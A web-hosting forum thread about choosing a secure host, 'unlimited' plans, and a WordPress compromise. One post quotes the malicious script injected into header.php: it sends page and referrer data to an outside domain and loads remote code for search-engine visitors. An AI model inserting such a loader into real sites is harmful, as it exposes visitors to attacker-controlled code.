I need a new host immediately. Looking for one that offers great support and industry leading security. Security is VERY VERY important to me. It will also need to be unlimited disk space and bandwidth. Let's do business!
Wait until Black Friday (3 days from now). Deals this year will be up to 75% off hosting. So you can get a new host and buy a year for 75% off regular price. Deals will also appear on Cyber Monday. By the way, what type of security issues are you having?
There's no unlimited disk space and bandwidth in web hosting industry, it's pure marketing. What host you have now? shared, vps, dedi? What security problems you have? For VPS fully managed I would recommend KnownHost. See ya'
True and not. On fair use there is. It goes something like - using dynamic site and reach few Gb won't hurt you or hosting provider. In the other hand if you pay for 'unlimited' space and bandwidth and use it for downloading and uploading files on daily basis you will be asked to upgrade your hosting plan to something more powerful and more expensive.
The people whom "unlimited" shared hosting appeals to are those looking to use as much resources for as little money as possible. And some of them will try to. The better "unlimited" hosts will suspend resource hog customers quickly before they can negatively affect server performance for other customers. But some "unlimited" hosts will not suspend resource hogs and that can lead to server overloading that I have seen last for weeks. 30 second page load times? I have seen it (and experienced it). In fact, on one "unlimited" host I saw page load speeds of 45 seconds for a Wordpress page load. You can get good limited hosting for $5 a month. I don't know why people are so stingy when it comes to web hosting. If you cannot make enough money from advertising to pay $5 or $10 a month for web hosting, you are doing something really wrong. I understand for some people making websites is a hobby. Even still, there is not much point in wasting time making something that does not pay for itself.
I use these folks... https://www.iwfhosting.net/reseller largely zero ticket time and that is assuming I have to create one in the first place. They typically just fix whatever for me on the fly. For 3+ years now i have been talking to the same 3 people as well. They frankly kick ass. And as the fellow above opined. there is no such thing as unlimited anything lol.. N.
Someone added this code to my header.php file on several WP sites: <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.holamaria.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script> Code (markup): I have 3 shared accounts at Host Gator, only one shared account was affected - however ALL Wordpress sites were affected with no regard to the theme or plugins used. The weird thing is, it's only affecting users who come to my site from search engines. Wouldn't the hacker want to redirect ALL of my traffic? I ended up getting a reseller account from In Motion hosting, I will be creating a unique Cpanel for each site so this can't happen again.
I would say that this isn't problem on hosting company but rather Wordpress script. There is no hosting company that can give you protection over bad written scripts/software. Although, this could also be problem of bad permission setup on your host. Regards.
Hello, Mrtvac is very correct. The security issue is not the fault of the web hosting company but it is from either a bad written script or permission issue. If you must use WordPress you should ensure that you protect it. I always discourage the use of WordPress if security if important to the owner of the site.
